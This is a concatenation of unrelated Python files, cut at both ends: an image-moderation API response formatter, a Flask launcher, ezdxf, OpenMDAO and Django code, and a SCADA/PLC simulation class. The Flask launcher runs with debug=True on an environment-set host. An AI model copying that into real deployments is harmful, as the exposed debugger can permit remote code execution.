"Visually Disturbing" class UnsafeContentCategorySecondLevelEnum(Enum): NUDITY = "Nudity" GRAPHIC_MALE_NUDITY = "Graphic Male Nudity" GRAPHIC_FEMALE_NUDITY = "Graphic Female Nudity" SEXUAL_ACTIVITY = "Sexual Activity" ILLUSTRATED_NUDITY_OR_SEXUAL_ACTIVITY = "Illustrated Nudity Or Sexual Activity" ADULT_TOYS = "Adult Toys" FEMALE_SWIMWEAR_OR_UNDERWEAR = "Female Swimwear Or Underwear" MALE_SWIMWEAR_OR_UNDERWEAR = "Male Swimwear Or Underwear" PARTIAL_NUDITY = "Partial Nudity" REVEALING_CLOTHES = "Revealing Clothes" GRAPHIC_VIOLENCE_OR_GORE = "Graphic Violence Or Gore" PHYSICAL_VIOLENCE = "Physical Violence" WEAPON_VIOLENCE = "Weapon Violence" WEAPONS = "Weapons" SELF_INJURY = "Self Injury" EMACIATED_BODIES = "Emaciated Bodies" CORPSES = "Corpses" HANGING = "Hanging" # ============================================================================== # CLASS AND FUNCTION 
DEFINITION # ============================================================================== class ObjectDetectionLabelingAPIResponseFormatter(ImageAPIResponseFormatterMeta): """ Formatter class for Object Detection & Labeling API responses: - make sure response is valid JSON - extract object labels in a dataset - compute column descriptions - draw bounding boxes around objects with text containing label name and confidence score """ def __init__(self, num_objects: int, orientation_correction: bool = True, **kwargs): store_attr() self._compute_column_description() def _compute_column_description(self): """Compute output column names and descriptions""" self.orientation_column = generate_unique("orientation_correction", self.input_df.keys(), self.column_prefix) self.label_list_column = generate_unique("label_list", self.input_df.keys(), self.column_prefix) self.label_name_columns = [ generate_unique("label_" + str(n + 1) + "_name", self.input_df.keys(), self.column_prefix) for n in range(self.num_objects) ] self.label_score_columns = [ generate_unique("label_" + str(n + 1) + "_score", self.input_df.keys(), self.column_prefix) for n in range(self.num_objects) ] self.column_description_dict[self.label_list_column] = "List of object labels from the API" self.column_description_dict[self.orientation_column] = "Orientation correction detected by the API" for n in range(self.num_objects): label_column = self.label_name_columns[n] score_column = self.label_score_columns[n] self.column_description_dict[label_column] = "Object label {} extracted by the API".format(n + 1) self.column_description_dict[score_column] = "Confidence score in label {} from 0 to 1".format(n + 1) def format_row(self, row: Dict) -> Dict: """Extract object and label lists from a row with an API response""" raw_response = row[self.api_column_names.response] response = safe_json_loads(raw_response, self.error_handling) row[self.label_list_column] = "" labels = sorted(response.get("Labels", []), key=lambda x: x.get("Confidence"), reverse=True) if len(labels) != 0: row[self.label_list_column] = [l.get("Name") for l in labels] for n in range(self.num_objects): if len(labels) > n: row[self.label_name_columns[n]] = labels[n].get("Name", "") row[self.label_score_columns[n]] = labels[n].get("Confidence", "") else: row[self.label_name_columns[n]] = "" row[self.label_score_columns[n]] = None if self.orientation_correction: row[self.orientation_column] = response.get("OrientationCorrection", "") return row def format_image(self, image: Image, response: Dict) -> Image: """Draw bounding boxes around detected objects""" bounding_box_list_dict = [ { "name": label.get("Name", ""), "bbox_dict": instance.get("BoundingBox", {}), "confidence": float(instance.get("Confidence") / 100.0), } for label in response.get("Labels", []) for instance in label.get("Instances", []) ] if self.orientation_correction: detected_orientation = response.get("OrientationCorrection", "") (image, rotated) = auto_rotate_image(image, detected_orientation) bounding_box_list_dict = sorted(bounding_box_list_dict, key=lambda x: x.get("confidence", 0), reverse=True) for bounding_box_dict in bounding_box_list_dict: bbox_text = "{} - {:.1%} ".format(bounding_box_dict["name"], bounding_box_dict["confidence"]) ymin = bounding_box_dict["bbox_dict"].get("Top") xmin = bounding_box_dict["bbox_dict"].get("Left") ymax = ymin + bounding_box_dict["bbox_dict"].get("Height") xmax = xmin + bounding_box_dict["bbox_dict"].get("Width") draw_bounding_box_pil_image(image, ymin, xmin, ymax, xmax, 
bbox_text) return image class TextDetectionAPIResponseFormatter(ImageAPIResponseFormatterMeta): """ Formatter class for Text Detection API responses: - make sure response is valid JSON - extract list of text transcriptions in a dataset - compute column descriptions - draw bounding boxes around detected text areas """ def __init__(self, minimum_score: float = 0.0, orientation_correction: bool = True, **kwargs): store_attr() self._compute_column_description() def _compute_column_description(self): """Compute output column names and descriptions""" self.orientation_column = generate_unique("orientation_correction", self.input_df.keys(), self.column_prefix) self.text_column_list = generate_unique("detections_list", self.input_df.keys(), self.column_prefix) self.text_column_concat = generate_unique("detections_concat", self.input_df.keys(), self.column_prefix) self.column_description_dict[self.text_column_list] = "List of text detections from the API" self.column_description_dict[self.text_column_concat] = "Concatenated text detections from the API" self.column_description_dict[self.orientation_column] = "Orientation correction detected by the API" def format_row(self, row: Dict) -> Dict: """Extract detected text from a row with an API response""" raw_response = row[self.api_column_names.response] response = safe_json_loads(raw_response, self.error_handling) text_detections = response.get("TextDetections", []) text_detections_filtered = [ t for t in text_detections if t.get("Confidence") >= self.minimum_score and t.get("ParentId") is None ] row[self.text_column_list] = "" row[self.text_column_concat] = "" if len(text_detections_filtered) != 0: row[self.text_column_list] = [t.get("DetectedText", "") for t in text_detections_filtered] row[self.text_column_concat] = " ".join(row[self.text_column_list]) if self.orientation_correction: row[self.orientation_column] = response.get("OrientationCorrection", "") return row def format_image(self, image: Image, response: Dict) -> Image: """Draw bounding boxes around detected text""" text_detections = response.get("TextDetections", []) text_bounding_boxes = [ t.get("Geometry", {}).get("BoundingBox", {}) for t in text_detections if t.get("Confidence") >= self.minimum_score and t.get("ParentId") is None ] if self.orientation_correction: detected_orientation = response.get("OrientationCorrection", "") (image, rotated) = auto_rotate_image(image, detected_orientation) for bbox in text_bounding_boxes: ymin = bbox.get("Top") xmin = bbox.get("Left") ymax = bbox.get("Top") + bbox.get("Height") xmax = bbox.get("Left") + bbox.get("Width") draw_bounding_box_pil_image(image=image, ymin=ymin, xmin=xmin, ymax=ymax, xmax=xmax) return image class UnsafeContentAPIResponseFormatter(ImageAPIResponseFormatterMeta): """ Formatter class for Unsafe Content API responses: - make sure response is valid JSON - extract moderation labels in a dataset - compute column descriptions """ def __init__( self, category_level: UnsafeContentCategoryLevelEnum = UnsafeContentCategoryLevelEnum.TOP, content_categories_top_level: List[UnsafeContentCategoryTopLevelEnum] = [], content_categories_second_level: List[UnsafeContentCategorySecondLevelEnum] = [], **kwargs ): store_attr() if self.category_level == UnsafeContentCategoryLevelEnum.TOP: self.content_category_enum = UnsafeContentCategoryTopLevelEnum self.content_categories = content_categories_top_level else: self.content_category_enum = UnsafeContentCategorySecondLevelEnum self.content_categories = content_categories_second_level 
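# The category level chosen above drives the rest of this formatter: the selected
# enum's members become the per-category "<name>_score" output columns, and
# format_row() matches top-level categories against a moderation label's
# "ParentName" while second-level categories are matched against its "Name".
# Rough usage sketch (assuming input_df / column_prefix and the other keyword
# arguments are consumed by the ImageAPIResponseFormatterMeta base via **kwargs;
# the names below are illustrative, not part of the plugin API):
#   formatter = UnsafeContentAPIResponseFormatter(
#       category_level=UnsafeContentCategoryLevelEnum.TOP,
#       content_categories_top_level=[UnsafeContentCategoryTopLevelEnum.VIOLENCE],
#       input_df=input_df, column_prefix="rekognition")
#   # then formatter.format_row(...) is applied to each row holding a raw response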
self._compute_column_description() def _compute_column_description(self): """Compute output column names and descriptions""" self.is_unsafe_column = generate_unique("unsafe_content", self.input_df.keys(), self.column_prefix) self.unsafe_list_column = generate_unique("unsafe_categories", self.input_df.keys(), self.column_prefix) self.column_description_dict[self.is_unsafe_column] = "Unsafe content detected by the API" self.column_description_dict[self.unsafe_list_column] = "List of unsafe content categories detected by the API" for n, m in self.content_category_enum.__members__.items(): confidence_column = generate_unique(n.lower() + "_score", self.input_df.keys(), self.column_prefix) self.column_description_dict[confidence_column] = "Confidence score in category '{}' from 0 to 1".format( m.value ) def format_row(self, row: Dict) -> Dict: """Extract moderation labels from a row with an API response""" raw_response = row[self.api_column_names.response] response = safe_json_loads(raw_response, self.error_handling) moderation_labels = response.get("ModerationLabels", []) row[self.is_unsafe_column] = False row[self.unsafe_list_column] = "" unsafe_list = [] for category in self.content_categories: confidence_column = generate_unique( category.name.lower() + "_score", self.input_df.keys(), self.column_prefix ) row[confidence_column] = "" if self.category_level == UnsafeContentCategoryLevelEnum.TOP: scores = [l.get("Confidence") for l in moderation_labels if l.get("ParentName", "") == category.value] else: scores = [l.get("Confidence") for l in moderation_labels if l.get("Name", "") == category.value] if len(scores) != 0: unsafe_list.append(str(category.value)) row[confidence_column] = scores[0] if len(unsafe_list) != 0: row[self.is_unsafe_column] = True row[self.unsafe_list_column] = unsafe_list return row 10-100 from os import environ from auth import app app.run(environ.get("HOST", "127.0.0.1"), environ.get("PORT", 5000), debug=True) import ezdxf doc = ezdxf.new('R2000') # hatch requires the DXF R2000 (AC1015) format or later msp = doc.modelspace() # adding entities to the model space # important: major axis >= minor axis (ratio <= 1.) # minor axis length = major axis length * ratio msp.add_ellipse((0, 0), major_axis=(0, 10), ratio=0.5) # by default a solid fill hatch with fill color=7 (white/black) hatch = msp.add_hatch(color=2) # every boundary path is always a 2D element edge_path = hatch.paths.add_edge_path() # each edge path can contain line arc, ellipse and spline elements # important: major axis >= minor axis (ratio <= 1.) 
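# For reference, the same hatch boundary could be assembled from other edge types,
# e.g. (signatures recalled from the ezdxf edge-path API — check the ezdxf docs
# before relying on them):
#   edge_path.add_line((-10, 0), (10, 0))
#   edge_path.add_arc(center=(0, 0), radius=10, start_angle=0, end_angle=180)
# Here the boundary is a single full ellipse matching the one added to the modelspace: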
edge_path.add_ellipse((0, 0), major_axis=(0, 10), ratio=0.5) doc.saveas("solid_hatch_ellipse.dxf") jameswilddev/Fau from .array_set import ArraySet from .u8 import U8 from .s8 import S8 from .u16 import U16 from .s16 import S16 from .u32 import U32 from .s32 import S32 from .f32 import F32 __all__ = ['ArraySet', 'U8', 'S8', 'U16', 'S16', 'U32', 'S32', 'F32'] friedenhe/OpenMDAOopenmdao/utils/tests/test_array_utils.py100-1000 import unittest import numpy as np from openmdao.utils.array_utils import array_connection_compatible, abs_complex, dv_abs_complex from openmdao.utils.assert_utils import assert_near_equal class TestArrayConnectionCompatible(unittest.TestCase): def test_ones_at_both_ends(self): shape1 = (1, 1, 15, 3, 1, 7, 1, 1, 1, 1) shape2 = (1, 15, 3, 1, 7) self.assertTrue(array_connection_compatible(shape1, shape2)) def test_ones_at_start(self): shape1 = (1, 1, 15, 3, 1, 7) shape2 = (1, 15, 3, 1, 7) self.assertTrue(array_connection_compatible(shape1, shape2)) def test_ones_at_end(self): shape1 = (15, 3, 1, 7, 1, 1, 1, 1) shape2 = (1, 15, 3, 1, 7) self.assertTrue(array_connection_compatible(shape1, shape2)) def test_ones_to_ones(self): shape1 = (1, 1, 1, 1, 1, 1, 1, 1) shape2 = (1, 1, 1, 1, 1) self.assertTrue(array_connection_compatible(shape1, shape2)) def test_ones_to_one(self): shape1 = (1, 1, 1, 1, 1, 1, 1, 1) shape2 = (1,) self.assertTrue(array_connection_compatible(shape1, shape2)) def test_matrix_to_vectorized_matrix(self): shape1 = (3, 3) shape2 = (1, 3, 3) self.assertTrue(array_connection_compatible(shape1, shape2)) def test_known_incompatable(self): shape1 = (3, 3) shape2 = (3, 1, 3) self.assertFalse(array_connection_compatible(shape1, shape2)) class TestArrayUtils(unittest.TestCase): def test_abs_complex(self): x = np.array([3.0 + 0.5j, -4.0 - 1.5j, -5.0 + 2.5j, -6.0 - 3.5j]) y = abs_complex(x) self.assertEqual(y[0], 3.0 + 0.5j) self.assertEqual(y[1], 4.0 + 1.5j) self.assertEqual(y[2], 5.0 - 2.5j) self.assertEqual(y[3], 6.0 + 3.5j) x = np.array([3.0 + 0.5j, -4.0 - 1.5j, -5.0 + 2.5j, -6.0 - 3.5j]) dx = 1.0 + 2j * np.ones((4, 3), dtype=complex) yy, dy = dv_abs_complex(x, dx) row = np.array([1.0 + 2j, 1.0 + 2j, 1.0 + 2j]) dy_check = np.vstack((row, -row, -row, -row)) assert_near_equal(dy, dy_check, 1e-10) if __name__ == "__main__": unittest.main() from django.contrib.contenttypes.models import ContentType from django.contrib.gis.db.models import Union from django.db.models import DurationField, Q from django.db.models.functions import Cast from django.utils.translation import ugettext_lazy as _ from enumfields.drf import EnumField, EnumSupportSerializerMixin from rest_framework import serializers from field_permissions.serializers import FieldPermissionsSerializerMixin from leasing.enums import LeaseRelationType from leasing.models import ( AreaNote, BasisOfRent, EmailLog, InfillDevelopmentCompensation, RelatedLease, ReservationProcedure) from leasing.serializers.debt_collection import ( CollectionCourtDecisionSerializer, CollectionLetterSerializer, CollectionNoteSerializer) from leasing.serializers.invoice import InvoiceNoteCreateUpdateSerializer, InvoiceNoteSerializer from users.models import User from users.serializers import UserSerializer from ..models import ( Contact, District, Financing, Hitas, IntendedUse, Lease, LeaseIdentifier, LeaseType, Municipality, NoticePeriod, Regulation, SpecialProject, StatisticalUse, SupportiveHousing) from .contact import ContactSerializer from .contract import ContractCreateUpdateSerializer, ContractSerializer from .decision import 
DecisionCreateUpdateNestedSerializer, DecisionSerializer from .inspection import InspectionSerializer from .land_area import ( LeaseAreaCreateUpdateSerializer, LeaseAreaListSerializer, LeaseAreaSerializer, LeaseAreaWithGeometryListSerializer) from .rent import ( LeaseBasisOfRentCreateUpdateSerializer, LeaseBasisOfRentSerializer, RentCreateUpdateSerializer, RentSerializer) from .tenant import TenantCreateUpdateSerializer, TenantSerializer from .utils import InstanceDictPrimaryKeyRelatedField, NameModelSerializer, UpdateNestedMixin class DistrictSerializer(serializers.ModelSerializer): class Meta: model = District fields = '__all__' class FinancingSerializer(serializers.ModelSerializer): class Meta: model = Financing fields = '__all__' class HitasSerializer(serializers.ModelSerializer): class Meta: model = Hitas fields = '__all__' class IntendedUseSerializer(serializers.ModelSerializer): class Meta: model = IntendedUse fields = '__all__' class LeaseTypeSerializer(EnumSupportSerializerMixin, serializers.ModelSerializer): class Meta: model = LeaseType fields = '__all__' class MunicipalitySerializer(NameModelSerializer): class Meta: model = Municipality fields = '__all__' class NoticePeriodSerializer(EnumSupportSerializerMixin, serializers.ModelSerializer): class Meta: model = NoticePeriod fields = '__all__' class RegulationSerializer(NameModelSerializer): class Meta: model = Regulation fields = '__all__' class StatisticalUseSerializer(NameModelSerializer): class Meta: model = StatisticalUse fields = '__all__' class SupportiveHousingSerializer(NameModelSerializer): class Meta: model = SupportiveHousing fields = '__all__' class SpecialProjectSerializer(NameModelSerializer): class Meta: model = SpecialProject fields = '__all__' class ReservationProcedureSerializer(NameModelSerializer): class Meta: model = ReservationProcedure fields = '__all__' class LeaseIdentifierSerializer(serializers.ModelSerializer): type = LeaseTypeSerializer() municipality = MunicipalitySerializer() district = DistrictSerializer() class Meta: model = LeaseIdentifier fields = ('type', 'municipality', 'district', 'sequence') class LeaseSuccinctSerializer(EnumSupportSerializerMixin, FieldPermissionsSerializerMixin, serializers.ModelSerializer): id = serializers.ReadOnlyField() type = LeaseTypeSerializer() municipality = MunicipalitySerializer() district = DistrictSerializer() identifier = LeaseIdentifierSerializer(read_only=True) class Meta: model = Lease fields = ('id', 'deleted', 'created_at', 'modified_at', 'type', 'municipality', 'district', 'identifier', 'start_date', 'end_date', 'state', 'is_rent_info_complete', 'is_invoicing_enabled', 'reference_number', 'note', 'preparer', 'is_subject_to_vat') class LeaseSuccinctWithGeometrySerializer(LeaseSuccinctSerializer): lease_areas = LeaseAreaWithGeometryListSerializer(many=True, required=False, allow_null=True) class Meta: model = Lease fields = ('id', 'deleted', 'created_at', 'modified_at', 'type', 'municipality', 'district', 'identifier', 'start_date', 'end_date', 'state', 'is_rent_info_complete', 'is_invoicing_enabled', 'reference_number', 'note', 'preparer', 'is_subject_to_vat', 'lease_areas') class RelatedToLeaseSerializer(EnumSupportSerializerMixin, serializers.ModelSerializer): to_lease = LeaseSuccinctSerializer() class Meta: model = RelatedLease fields = '__all__' class RelatedLeaseSerializer(EnumSupportSerializerMixin, serializers.ModelSerializer): def validate(self, data): if data['from_lease'] == data['to_lease']: raise serializers.ValidationError(_("from_lease and 
to_lease cannot be the same Lease")) return data class Meta: model = RelatedLease fields = '__all__' class RelatedFromLeaseSerializer(EnumSupportSerializerMixin, serializers.ModelSerializer): from_lease = LeaseSuccinctSerializer() class Meta: model = RelatedLease fields = '__all__' class LeaseSerializerBase(EnumSupportSerializerMixin, FieldPermissionsSerializerMixin, serializers.ModelSerializer): id = serializers.ReadOnlyField() type = LeaseTypeSerializer() municipality = MunicipalitySerializer() district = DistrictSerializer() identifier = LeaseIdentifierSerializer(read_only=True) tenants = TenantSerializer(many=True, required=False, allow_null=True) lease_areas = LeaseAreaSerializer(many=True, required=False, allow_null=True) lessor = ContactSerializer(required=False, allow_null=True) contracts = ContractSerializer(many=True, required=False, allow_null=True) decisions = DecisionSerializer(many=True, required=False, allow_null=True) inspections = InspectionSerializer(many=True, required=False, allow_null=True) rents = RentSerializer(many=True, required=False, allow_null=True) basis_of_rents = LeaseBasisOfRentSerializer(many=True, required=False, allow_null=True) collection_court_decisions = CollectionCourtDecisionSerializer(many=True, required=False, allow_null=True) collection_letters = CollectionLetterSerializer(many=True, required=False, allow_null=True) collection_notes = CollectionNoteSerializer(many=True, required=False, allow_null=True) invoice_notes = InvoiceNoteSerializer(many=True, required=False, allow_null=True) class Meta: model = Lease exclude = ('related_leases', ) class LeaseListSerializer(LeaseSerializerBase): basis_of_rents = None contracts = None decisions = None inspections = None rents = None related_leases = None lease_areas = LeaseAreaListSerializer(many=True, required=False, allow_null=True) collection_court_decisions = None collection_letters = None collection_notes = None def get_related_lease_predecessors(to_lease_id, accumulator=None): if accumulator is None: accumulator = [] accumulator.append(to_lease_id) result = set() predecessors = RelatedLease.objects.filter(to_lease=to_lease_id).select_related('to_lease', 'from_lease') if predecessors: for predecessor in predecessors: result.add(predecessor) if predecessor.from_lease_id == predecessor.to_lease_id: continue if predecessor.from_lease_id in accumulator: continue result.update(get_related_lease_predecessors(predecessor.from_lease_id, accumulator)) return result def get_related_leases(obj): # Immediate successors related_to_leases = set(RelatedLease.objects.filter(from_lease=obj).select_related('to_lease', 'from_lease')) # All predecessors related_from_leases = get_related_lease_predecessors(obj.id) return { 'related_to': RelatedToLeaseSerializer(related_to_leases, many=True).data, 'related_from': RelatedFromLeaseSerializer(related_from_leases, many=True).data, } class LeaseRetrieveSerializer(LeaseSerializerBase): related_leases = serializers.SerializerMethodField() preparer = UserSerializer() infill_development_compensations = serializers.SerializerMethodField() email_logs = serializers.SerializerMethodField() area_notes = serializers.SerializerMethodField() matching_basis_of_rents = serializers.SerializerMethodField() def get_related_leases(self, obj): return get_related_leases(obj) def override_permission_check_field_name(self, field_name): if field_name == 'infill_development_compensations': return 'infill_development_compensation_leases' if field_name in ('area_notes', 'email_logs'): return 'lease_areas' 
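# Any other serializer field falls through unchanged below. The
# SerializerMethodFields on this serializer are computed from related models,
# so they are remapped here onto the model relation whose field permissions
# should gate them (e.g. 'email_logs' and 'area_notes' are only exposed to
# users who may see 'lease_areas').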
return field_name def get_infill_development_compensations(self, obj): infill_development_compensations = InfillDevelopmentCompensation.objects.filter( infill_development_compensation_leases__lease__id=obj.id) return [{'id': idc.id, 'name': idc.name} for idc in infill_development_compensations] def get_email_logs(self, obj): from leasing.serializers.email import EmailLogSerializer lease_content_type = ContentType.objects.get_for_model(obj) email_logs = EmailLog.objects.filter(content_type=lease_content_type, object_id=obj.id) return EmailLogSerializer(email_logs, many=True).data def get_area_notes(self, obj): from leasing.serializers.area_note import AreaNoteSerializer area_notes = None combined_area = obj.lease_areas.aggregate(union=Union("geometry"))["union"] if combined_area: area_notes = AreaNote.objects.filter(geometry__intersects=combined_area) return AreaNoteSerializer(area_notes, many=True).data def get_matching_basis_of_rents(self, obj): from leasing.serializers.basis_of_rent import BasisOfRentSerializer q = Q() property_identifiers = obj.lease_areas.values_list("identifier", flat=True) if property_identifiers: q = Q(property_identifiers__identifier__in=property_identifiers) combined_area = obj.lease_areas.aggregate(union=Union("geometry"))["union"] if combined_area: q |= Q(geometry__intersects=combined_area) if not q: return [] return BasisOfRentSerializer(BasisOfRent.objects.filter(q), many=True).data class Meta: model = Lease fields = '__all__' exclude = None class LeaseUpdateSerializer(UpdateNestedMixin, EnumSupportSerializerMixin, FieldPermissionsSerializerMixin, serializers.ModelSerializer): id = serializers.ReadOnlyField() identifier = LeaseIdentifierSerializer(read_only=True) tenants = TenantCreateUpdateSerializer(many=True, required=False, allow_null=True) lease_areas = LeaseAreaCreateUpdateSerializer(many=True, required=False, allow_null=True) lessor = InstanceDictPrimaryKeyRelatedField(instance_class=Contact, queryset=Contact.objects.filter(is_lessor=True), related_serializer=ContactSerializer, required=False, allow_null=True) contracts = ContractCreateUpdateSerializer(many=True, required=False, allow_null=True) decisions = DecisionCreateUpdateNestedSerializer(many=True, required=False, allow_null=True) inspections = InspectionSerializer(many=True, required=False, allow_null=True) rents = RentCreateUpdateSerializer(many=True, required=False, allow_null=True) basis_of_rents = LeaseBasisOfRentCreateUpdateSerializer(many=True, required=False, allow_null=True) preparer = InstanceDictPrimaryKeyRelatedField(instance_class=User, queryset=User.objects.all(), related_serializer=UserSerializer, required=False, allow_null=True) related_leases = serializers.SerializerMethodField() notice_period = serializers.PrimaryKeyRelatedField( required=False, allow_null=True, queryset=NoticePeriod.objects.all().annotate( duration_as_interval=Cast('duration', DurationField())).order_by('duration_as_interval')) invoice_notes = InvoiceNoteCreateUpdateSerializer(many=True, required=False, allow_null=True) def get_related_leases(self, obj): return get_related_leases(obj) class Meta: model = Lease fields = '__all__' read_only_fields = ('is_invoicing_enabled', 'is_rent_info_complete') class LeaseCreateSerializer(LeaseUpdateSerializer): relate_to = serializers.PrimaryKeyRelatedField(required=False, allow_null=True, queryset=Lease.objects.all()) relation_type = EnumField(required=False, allow_null=True, enum=LeaseRelationType) def override_permission_check_field_name(self, field_name): if field_name in 
('relate_to', 'relation_type'): return 'related_leases' return field_name class Meta: model = Lease fields = '__all__' read_only_fields = ('is_invoicing_enabled', 'is_rent_info_complete') agent/migrations/0002_agent_sexe.py # Generated by Django 3.1.7 on 2021-07-18 22:52 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('agent', '0001_initial'), ] operations = [ migrations.AddField( model_name='agent', name='sexe', field=models.CharField(choices=[('Homme', 'Homme'), ('Femme', 'Femme')], default='', max_length=30), preserve_default=False, ), ] import argparse import csv import os.path import random import signal import sqlite3 import sys import time from collections import OrderedDict from datetime import datetime from decimal import Decimal from pathlib import Path import yaml from basePLC import BasePLC from py2_logger import get_logger import threading import thread class Error(Exception): """Base class for exceptions in this module.""" class TagDoesNotExist(Error): """Raised when tag you are looking for does not exist""" class InvalidControlValue(Error): """Raised when tag you are looking for does not exist""" class DatabaseError(Error): """Raised when not being able to connect to the database""" class GenericScada(BasePLC): """ This class represents a scada. This scada knows what plcs it is collecting data from by reading the yaml file at intermediate_yaml_path and looking at the plcs. """ DB_TRIES = 10 """Amount of times a db query will retry on a exception""" SCADA_CACHE_UPDATE_TIME = 2 """ Time in seconds the SCADA server updates its cache""" def __init__(self, intermediate_yaml_path): with intermediate_yaml_path.open() as yaml_file: self.intermediate_yaml = yaml.load(yaml_file, Loader=yaml.FullLoader) self.logger = get_logger(self.intermediate_yaml['log_level']) self.output_path = Path(self.intermediate_yaml["output_path"]) / "scada_values.csv" self.output_path.touch(exist_ok=True) # Create state from db values state = { 'name': "plant", 'path': self.intermediate_yaml['db_path'] } # Create server, real tags are generated scada_server = { 'address': self.intermediate_yaml['scada']['local_ip'], 'tags': self.generate_real_tags(self.intermediate_yaml['plcs']) } # Create protocol scada_protocol = { 'name': 'enip', 'mode': 1, 'server': scada_server } self.plc_data = self.generate_plcs() self.saved_values = [['iteration', 'timestamp']] for PLC in self.intermediate_yaml['plcs']: if 'sensors' not in PLC: PLC['sensors'] = list() if 'actuators' not in PLC: PLC['actuators'] = list() self.saved_values[0].extend(PLC['sensors']) self.saved_values[0].extend(PLC['actuators']) self.update_cache_flag = False self.plcs_ready = False self.cache = {} for ip in self.plc_data: self.cache[ip] = [0] * len(self.plc_data[ip]) self.do_super_construction(scada_protocol, state) def do_super_construction(self, scada_protocol, state): """ Function that performs the super constructor call to SCADAServer Introduced to better facilitate testing """ super(GenericScada, self).__init__(name='scada', state=state, protocol=scada_protocol) @staticmethod def generate_real_tags(plcs): """ Generates real tags with all sensors and actuators attached to plcs in the network. 
:param plcs: list of plcs """ real_tags = [] for plc in plcs: if 'sensors' not in plc: plc['sensors'] = list() if 'actuators' not in plc: plc['actuators'] = list() for sensor in plc['sensors']: if sensor != "": real_tags.append((sensor, 1, 'REAL')) for actuator in plc['actuators']: if actuator != "": real_tags.append((actuator, 1, 'REAL')) return tuple(real_tags) @staticmethod def generate_tags(taggable): """ Generates tags from a list of taggable entities (sensor or actuator) :param taggable: a list of strings containing names of things like tanks, pumps, and valves """ tags = [] if taggable: for tag in taggable: if tag and tag != "": tags.append((tag, 1)) return tags def pre_loop(self, sleep=0.5): """ The pre loop of a SCADA. In which setup actions are started. :param sleep: (Default value = 0.5) The time to sleep after setting everything up """ self.logger.debug('SCADA enters pre_loop') self.db_sleep_time = random.uniform(0.01, 0.1) signal.signal(signal.SIGINT, self.sigint_handler) signal.signal(signal.SIGTERM, self.sigint_handler) self.keep_updating_flag = True self.cache_update_process = None time.sleep(sleep) def db_query(self, query, write=False, parameters=None): """ Execute a query on the database On a :code:`sqlite3.OperationalError` it will retry with a max of :code:`DB_TRIES` tries. Before it reties, it will sleep for :code:`DB_SLEEP_TIME` seconds. This is necessary because of the limited concurrency in SQLite. :param query: The SQL query to execute in the db :type query: str :param write: Boolean flag to indicate if this query will write into the database :param parameters: The parameters to put in the query. This must be a tuple. :raise DatabaseError: When a :code:`sqlite3.OperationalError` is still raised after :code:`DB_TRIES` tries. """ for i in range(self.DB_TRIES): try: with sqlite3.connect(self.intermediate_yaml["db_path"]) as conn: cur = conn.cursor() if parameters: cur.execute(query, parameters) else: cur.execute(query) conn.commit() if not write: return cur.fetchone()[0] else: return except sqlite3.OperationalError as exc: self.logger.info( "Failed to connect to db with exception {exc}. Trying {i} more times.".format( exc=exc, i=self.DB_TRIES - i - 1)) time.sleep(self.db_sleep_time) self.logger.error("Failed to connect to db. Tried {i} times.".format(i=self.DB_TRIES)) raise DatabaseError("Failed to get master clock from database") def get_sync(self, flag): """ Get the sync flag of this plc. On a :code:`sqlite3.OperationalError` it will retry with a max of :code:`DB_TRIES` tries. Before it reties, it will sleep for :code:`DB_SLEEP_TIME` seconds. :return: False if physical process wants the plc to do a iteration, True if not. :raise DatabaseError: When a :code:`sqlite3.OperationalError` is still raised after :code:`DB_TRIES` tries. """ res = self.db_query("SELECT flag FROM sync WHERE name IS ?", False, ('scada',)) return res == flag def set_sync(self, flag): """ Set this plcs sync flag in the sync table. When this is 1, the physical process knows this plc finished the requested iteration. On a :code:`sqlite3.OperationalError` it will retry with a max of :code:`DB_TRIES` tries. Before it reties, it will sleep for :code:`DB_SLEEP_TIME` seconds. :param flag: True for sync to 1, False for sync to 0 :type flag: bool :raise DatabaseError: When a :code:`sqlite3.OperationalError` is still raised after :code:`DB_TRIES` tries. """ self.db_query("UPDATE sync SET flag=? 
WHERE name IS ?", True, (int(flag), 'scada',)) def stop_cache_update(self): self.update_cache_flag = False def sigint_handler(self, sig, frame): """ Shutdown protocol for the scada, writes the output before exiting. """ self.stop_cache_update() self.logger.debug("SCADA shutdown") self.write_output() sys.exit(0) def write_output(self): """ Writes the csv output of the scada """ with self.output_path.open(mode='wb') as output: writer = csv.writer(output) writer.writerows(self.saved_values) def generate_plcs(self): """ Generates a list of tuples, the first part being the ip of a PLC, and the second being a list of tags attached to that PLC. """ plcs = OrderedDict() for PLC in self.intermediate_yaml['plcs']: if 'sensors' not in PLC: PLC['sensors'] = list() if 'actuators' not in PLC: PLC['actuators'] = list() tags = [] tags.extend(self.generate_tags(PLC['sensors'])) tags.extend(self.generate_tags(PLC['actuators'])) plcs[PLC['public_ip']] = tags return plcs def get_master_clock(self): """ Get the value of the master clock of the physical process through the database. On a :code:`sqlite3.OperationalError` it will retry with a max of :code:`DB_TRIES` tries. Before it reties, it will sleep for :code:`DB_SLEEP_TIME` seconds. :return: Iteration in the physical process. :raise DatabaseError: When a :code:`sqlite3.OperationalError` is still raised after :code:`DB_TRIES` tries. """ master_time = self.db_query("SELECT time FROM master_time WHERE id IS 1", False, None) return master_time def update_cache(self, lock, cache_update_time): """ Update the cache of the scada by receiving all the required tags. When something cannot be received, the previous values are used. """ while self.update_cache_flag: for plc_ip in self.cache: try: values = self.receive_multiple(self.plc_data[plc_ip], plc_ip) with lock: self.cache[plc_ip] = values except Exception as e: self.logger.error( "PLC receive_multiple with tags {tags} from {ip} failed with exception '{e}'".format( tags=self.plc_data[plc_ip], ip=plc_ip, e=str(e))) time.sleep(cache_update_time) continue time.sleep(cache_update_time) def main_loop(self, sleep=0.5, test_break=False): """ The main loop of a PLC. In here all the controls will be applied. :param sleep: (Default value = 0.5) Not used :param test_break: (Default value = False) used for unit testing, breaks the loop after one iteration """ self.logger.debug("SCADA enters main_loop") lock = None while True: while not self.get_sync(0): time.sleep(self.db_sleep_time) self.set_sync(1) while not self.get_sync(2): pass # Wait until we acquire the first sync before polling the PLCs if not self.plcs_ready: self.plcs_ready = True self.update_cache_flag = True self.logger.debug("SCADA starting update cache thread") lock = threading.Lock() thread.start_new_thread(self.update_cache, (lock, self.SCADA_CACHE_UPDATE_TIME)) master_time = self.get_master_clock() results = [master_time, datetime.now()] with lock: for plc_ip in self.plc_data: results.extend(self.cache[plc_ip]) self.saved_values.append(results) # Save scada_values.csv when needed if 'saving_interval' in self.intermediate_yaml and master_time != 0 and \ master_time % self.intermediate_yaml['saving_interval'] == 0: self.write_output() self.set_sync(3) if test_break: break def is_valid_file(parser_instance, arg): """ Verifies whether the intermediate yaml path is valid. 
